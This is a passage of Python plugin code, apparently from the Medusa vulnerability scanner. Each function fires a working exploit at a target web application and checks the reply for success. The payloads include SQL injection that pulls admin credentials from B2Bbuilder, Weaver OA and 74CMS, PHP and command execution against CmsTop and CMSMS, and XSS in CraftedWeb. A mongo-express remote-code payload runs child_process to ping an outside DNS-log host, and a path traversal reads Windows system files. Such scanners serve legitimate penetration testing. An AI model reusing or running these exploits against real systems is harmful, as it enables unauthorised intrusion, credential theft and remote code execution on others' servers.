e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/main.php?m=company&s=admin/business_info_list' payload_url = scheme + "://" + url + ":" + str(port) + payload data = "del[]=1) or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,md5(c)) from hy_admin))),0) %23&updateID=11&cc=6750" headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPost数据:{}\r\n返回内容:{}\r\n".format( url, payload_url, data, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333" payload_url = url + payload Headers['Content-Type'] = 'application/x-www-form-urlencoded' Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' s = requests.session() resp = s.post(payload_url, data={ 'formids': '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1' }, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.lower( ).find('''"draggable":''') != -1 and con.lower( ).find('''"checked":''') != -1 and con.lower().find( '''"id":''') != -1 and con.lower().find('''"text":''') != -1: Medusa = "{}存在泛微OA_WorkflowCenterTreeData接口注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format( url, payload_url, '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1') _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" payloadurl = scheme + "://" + url + ":" + str(port) + payload payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" domain_name = ".".join(url.split(".")[1:]) payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2 Payloads = [payloadurl,payloadurl2] Medusas = [] # 存放返回数据 for payload_url in Payloads: try: headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 : Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) web=ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名 if len(Medusas) != 0: result = "" for i in Medusas: result = result + i + "\n" return (str(result))
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = ClassCongregation.randoms().result(20) payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format( RD) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1: Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: true_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=52" false_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=53" payload_url = scheme + "://" + url + ":" + str(port) + true_payload payload_url2 = scheme + "://" + url + ":" + str(port) + false_payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) con = resp.text con2 = resp2.text code = resp.status_code code2 = resp2.status_code if code == 200 and code2 == 200 and con.find( 'url="wap-jobs-show.php?id=1"') != -1 and con2.find( 'url="wap-jobs-show.php?id=1"') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4" data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "115", "Connection": "close", "Pragma": "no-cache", "Cache-Control": "no-cache" } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('''{"response":"Success","details":"}''') != -1: Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/checkValid" payload_url = scheme + "://" + url + ":" + str(port) + payload dns = Dnslog() data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format( dns.dns_host()) headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Authorization': 'Basic YWRtaW46cGFzcw==', 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '123' } s = requests.session() s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) time.sleep(10) if dns.result(): Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format( url, payload_url, data) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/5clib/kindaction.action" data = "filePath=&kind=music&curpage=1&actionName=&subkind=c:/windows&pagesize=20&curPage=1&toPage=1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('system.ini') != -1: Medusa = "{}存在五车图书管理系统存在任意文件遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名